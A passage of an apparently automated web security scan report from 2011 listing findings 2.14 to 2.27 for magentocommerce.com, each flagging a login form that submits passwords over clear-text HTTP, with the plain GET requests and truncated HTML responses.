Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.14. http://www.magentocommerce.com/company/careers  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.15. http://www.magentocommerce.com/company/contact-us  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.16. http://www.magentocommerce.com/company/contact-us/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.17. http://www.magentocommerce.com/company/contact-us/thank_you  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.18. http://www.magentocommerce.com/company/events  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.19. http://www.magentocommerce.com/company/events/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.20. http://www.magentocommerce.com/company/inthepress  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.21. http://www.magentocommerce.com/company/inthepress/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.22. http://www.magentocommerce.com/company/jobs/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.23. http://www.magentocommerce.com/company/leadership  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.24. http://www.magentocommerce.com/company/leadership/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.25. http://www.magentocommerce.com/company/media  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.26. http://www.magentocommerce.com/company/media/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.27. http://www.magentocommerce.com/company/pci-compliance  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
